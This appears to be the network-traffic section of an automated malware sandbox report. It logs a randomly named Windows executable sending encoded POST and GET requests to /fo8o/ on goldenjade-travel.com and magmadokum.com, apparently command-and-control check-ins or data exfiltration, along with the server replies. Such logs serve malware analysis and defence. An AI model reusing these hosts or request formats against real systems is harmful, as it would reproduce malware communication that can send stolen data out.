                                                                                      Data Ascii: U6YDsxW=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOOzBj6J67kvfST70CWxWfgrgX0UeBZ7eOVEvkWEvu0Ad
                                                                                      Dec 2, 2024 14:31:40.857621908 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:40 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.649860116.50.37.244806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:31:42.011331081 CET831OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 4c 69 58 32 4d 73 42 35 37 30 4d 56 38 76 32 42 49 49 68 41 6c 2b 38 2b 42 70 78 61 52 6b 2f 44 62 30 6e 74 44 6e 41 5a 64 45 59 67 3d 3d
                                                                                      Data Ascii: U6YDsxW=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwLiX2MsB570MV8v2BIIhAl+8+BpxaRk/Db0ntDnAZdEYg==
                                                                                      Dec 2, 2024 14:31:43.593022108 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:43 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.649867116.50.37.244806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:31:44.666912079 CET1844OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Origin: http://www.goldenjade-travel.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 66 69 65 30 2f 78 4c 78 78 5a 52 42 6e 6e 4f 6d 38 30 5a 50 75 46 57 32 35 57 38 33 63 2f 75 7a 74 41 38 6f 49 79 36 5a 78 35 31 51 37 47 6b 34 53 59 56 49 68 50 49 33 76 65 67 37 42 74 6a 76 48 74 63 6e 51 35 58 36 36 46 6f 2f 61 42 35 66 75 57 45 4f 78 51 32 58 67 70 56 6f 63 78 76 32 57 77 2b 4b 4d 2b 33 71 61 42 6f 69 6c 59 36 74 46 42 74 67 56 56 49 78 73 33 66 6b 30 51 50 58 72 61 68 39 70 4c 53 54 37 41 78 58 65 4c 63 70 74 74 44 61 36 75 65 43 48 54 68 55 66 34 45 37 [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnfie0/xLxxZRBnnOm80ZPuFW25W83c/uztA8oIy6Zx51Q7Gk4SYVIhPI3veg7BtjvHtcnQ5X66Fo/aB5fuWEOxQ2XgpVocxv2Ww+KM+3qaBoilY6tFBtgVVIxs3fk0QPXrah9pLST7AxXeLcpttDa6ueCHThUf4E7TJI6J0begpvdJJcJDMI7f9ZZvplcBtpJFkNRdcTUOp8UhyoQzN3uRn068E7b8T3fWdLG9xYgp1jaiB4QpVWhwWcgek2BPOP8VpQEsmp/aDoZQTnrp54Hp/Mz08dCnVpVz3UHzmev89AuG9CmN+dbrlVUt6LQQY6s3P8m0frWTXfkLTpcQVpCpvC0S/C+Ksq48VMlvhGhD56zinvfxhkCYTpVQzisTzii5ItAaAWzu7x2pD0AbLVYN4RZJo40N4oftACttlMTTbK/tkbduINwDrKC5GB1El2qE4KpU95OIfm4uqZGt2pOu77F0rioMP+LO43oShjrJy02G5PqBZhRSLFLg9JBha1JlR98tj/YPg9nYCHaYpZcse4vZQQuha+fUtHvDtsDkkAbaid5otVHEYxGOhPD/6OwgxWPuX3yyxek4UDhtumKvbvtYC552ZLFYKSsziJLU3oUdUuGszAt0tkWFwApTIJ+cHgNSqzRv6mL+TH8VAfBAkXPQnCgyvc81hxT5sdh8TkYQm6BCAWAVGAaVTkuED+LfGlGqaMnYmgC6CZZMRIBw+GzlpkVeSq5pdNiOCraYcno2YW+9rtBOGsQAqK39E/d8J3cb0Hn5SgLK4WxrOwZzu+uGTHJdDkNRUxsRIX8AVEa5YbRof3w1KR7N6TOVIylTx [TRUNCATED]
                                                                                      Dec 2, 2024 14:31:46.276424885 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:45 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.649874116.50.37.244806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:31:47.323075056 CET532OUTGET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.goldenjade-travel.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:31:48.839977980 CET492INHTTP/1.1 404 Not Found
                                                                                      Content-Type: text/html; charset=us-ascii
                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                      Date: Mon, 02 Dec 2024 13:31:48 GMT
                                                                                      Connection: close
                                                                                      Content-Length: 315
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.64990985.159.66.93806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:32:03.229765892 CET786OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 212
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75
                                                                                      Data Ascii: U6YDsxW=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.64991685.159.66.93806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:32:05.889733076 CET810OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 236
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d
                                                                                      Data Ascii: U6YDsxW=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.64992285.159.66.93806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:32:08.544080973 CET1823OUTPOST /fo8o/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Host: www.magmadokum.com
                                                                                      Origin: http://www.magmadokum.com
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1248
                                                                                      Referer: http://www.magmadokum.com/fo8o/
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Data Raw: 55 36 59 44 73 78 57 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 6c [TRUNCATED]
                                                                                      Data Ascii: U6YDsxW=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMauEm8bCpZ07xKGKP3Hc2vy4DiE+H6HrFiKhcecr+aUYwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KM0XOCe8XRcDTVghixeA7v8gYFi/8kessKyee1EOvN8QJNfUDGMg+e9y1shQ9usKTssJgv/mdbp/oCt3lId22W4Y81k5HtKy5x22frMsbOotkvbhi646rremCShbroDUjUgsu6c7CjYLkKtFzmpXRGl3Ld7CbiBmuRiduyNdov15vLDVfDEui7tum9E7v4e63VvBdeC6joDS6shuFcb4J0muXndGqjsZzyJG0j/SslrqRihzqqCgho0HnUlciGFL3NXW+tWURlL1cCc4BMrepvUxTDjwpBzNzFaksp+A5VwcSc4WFI+aihmIJlg7EJs13kpMWCJX/+WbKYHKY3+T3bfyzWCTNQ6wAp6JjvaTYaz8GYfdHyQLYRPt4nFYWS02B9Y4/UuwPjSa2+S/+ZUJD0mFwOFpd/UaVEJy20CWWfgfqDZG8R2dMvnd7PuTUZ3ZEAWwkcs/3cUC8BnIK285v2IuvaiBXs2Nm0BQDOzoF2Wr+zhje86nlyoq6dmx782qZxlxWS6cEPhIofgX/UmovvfAfGxbswiBlIgjbQv43FPeWUYFq2OSc32m0PpdkKGDck+WQeFIbtTpAirxB84paDGX+UuBvs9oRlfN9YpWWrobTkUJVhTJMasV72SHqy2faJPw51w05Pabcfu+eGDafkuFamYllEy8B+eLT7rDEvS7Bt+lKe5myvGzvhNHaHBkghkeegmadgtcGD+ga1ZMod+TpSmNwN8uWspb1vuWNNnalfk2Rc8 [TRUNCATED]


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.64992885.159.66.93806392C:\Program Files (x86)\wWciysuSWdLhasblxZJKRulEsTPKbhajUaAnuEezLZOsAMrQ\UIOYLdBBxOZnTzrp.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Dec 2, 2024 14:32:11.206867933 CET525OUTGET /fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                      Accept-Language: en-US,en
                                                                                      Host: www.magmadokum.com
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                      Dec 2, 2024 14:33:12.634596109 CET194INHTTP/1.0 504 Gateway Time-out
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
